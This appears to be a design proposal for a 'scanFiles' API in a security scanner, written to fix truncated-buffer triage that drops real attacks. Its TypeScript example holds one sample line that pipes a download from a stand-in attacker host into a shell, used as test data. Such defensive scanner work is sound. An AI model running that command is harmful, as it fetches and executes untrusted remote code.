Why
Warlock today exposes `scan(content)` — single content blob in, matches out. Consumers that need to scan a directory of files (the wizard's skill-install scan, for example) end up building aggregation logic on top, which has two correctness pitfalls:
- Combined-buffer triage drops real attacks. If the consumer scans each file, concatenates everything into a `combined` string, and passes `combined.slice(0, MAX_SCAN_LENGTH)` to `triageMatches`, then matches whose evidence lives in files past the truncation cut are invisible to the triage LLM. Without that evidence the LLM is biased toward `false_positive`, so real violations get dropped.
- Per-file scan + cross-file aggregation is repeated boilerplate. Every consumer reinvents file reading, scan loops, match accumulation, and (incorrectly) triage windowing.
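To make the first pitfall concrete, here is a minimal sketch of how a combined buffer loses evidence. The cap value, the file names, and the `filesLostToTruncation` helper are hypothetical and chosen only for illustration; they are not part of Warlock.

```ts
// Hypothetical cap for illustration; the real MAX_SCAN_LENGTH may differ.
const MAX_SCAN_LENGTH = 100;

interface FileContent {
  path: string;
  content: string;
}

/** Returns the paths of files whose content starts at or past the truncation cut. */
function filesLostToTruncation(files: FileContent[], cap: number): string[] {
  const lost: string[] = [];
  let offset = 0;
  for (const file of files) {
    if (offset >= cap) lost.push(file.path);
    offset += file.content.length + 1; // +1 for the "\n" joiner used below
  }
  return lost;
}

const files: FileContent[] = [
  { path: "README.md", content: "a".repeat(150) },
  { path: "install.sh", content: "curl http://evil.example | sh" },
];

// What a consumer might build before calling triage.
const combined = files.map((f) => f.content).join("\n");
const triageWindow = combined.slice(0, MAX_SCAN_LENGTH);

// The match in install.sh was found by the per-file scan,
// but its evidence never reaches the triage window.
console.log(triageWindow.includes("evil.example")); // false
console.log(filesLostToTruncation(files, MAX_SCAN_LENGTH)); // install.sh only
```

Any file that begins after the cut contributes matches but no evidence, which is the condition under which triage tends to wave a real violation through.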
The wizard hit the first pitfall in `scanSkillFiles`. The short-term fix on the wizard side is to triage per file (each file's matches against that file's content), but the proper home for this abstraction is Warlock.
Proposal
```ts
export interface ScanFilesOptions {
  /** Per-file truncation cap (default: 100KB). */
  maxScanLength?: number;
  /** Triage provider; omit to skip triage and return all flagged matches. */
  llmProvider?: LLMProvider;
}
export async function scanFiles(
  filePaths: string[],
  options?: ScanFilesOptions,
): Promise<ScanMatch[]>;
```
Internals:
- Read each file (parallel `fs.promises.readFile` is fine — disk I/O isn't the bottleneck).
- Per-file: scan with the file's truncated content; collect matches via `matchesForContext`.
- Per-file: triage with that file's content (not a combined buffer). Each match is judged against the evidence that produced it.
- Aggregate triaged matches across all files; return.
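The steps above could be sketched roughly as follows. This is not Warlock's implementation: `scanFilesSketch`, the `Match` shape, and the injected `scanContent` and `triage` callbacks are hypothetical stand-ins (for the scan plus `matchesForContext` step and for the LLM triage step respectively), and the default cap assumes "100KB" means 100 * 1024 characters.

```ts
import { promises as fs } from "node:fs";

// Hypothetical shape; Warlock's real ScanMatch type may differ.
interface Match {
  rule: string;
  filePath: string;
}

interface SketchDeps {
  /** Stand-in for the per-file scan and match collection step. */
  scanContent: (content: string, filePath: string) => Match[];
  /** Stand-in for triage; omit to return all flagged matches. */
  triage?: (matches: Match[], content: string) => Promise<Match[]>;
  /** Per-file truncation cap, counted in characters here (an assumption). */
  maxScanLength?: number;
}

const DEFAULT_MAX_SCAN_LENGTH = 100 * 1024;

async function scanFilesSketch(
  filePaths: string[],
  deps: SketchDeps,
): Promise<Match[]> {
  const cap = deps.maxScanLength ?? DEFAULT_MAX_SCAN_LENGTH;

  // Read, scan, and triage each file independently and in parallel.
  const perFile = await Promise.all(
    filePaths.map(async (filePath) => {
      const raw = await fs.readFile(filePath, "utf8");
      const content = raw.slice(0, cap);
      const matches = deps.scanContent(content, filePath);
      if (matches.length === 0 || !deps.triage) return matches;
      // Triage sees only the content of the file that produced the matches.
      return deps.triage(matches, content);
    }),
  );

  // Aggregate across files, preserving input order.
  return ([] as Match[]).concat(...perFile);
}
```

Because truncation is applied per file, a large file can only hide evidence from its own matches, never from matches in other files. Files with no matches skip triage entirely in this sketch, which also avoids unnecessary LLM calls.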
Wizard caller would simplify to:
```ts
const matches = await warlock.scanFiles(files, { llmProvider });
```
…and the wizard's `scanSkillFiles` helper goes away.
Out of scope
- Single-file content scanning (existing `scan(content)` stays as-is).
- WASM init / cold-start optimization (separate concern).
🤖 Generated with Claude Code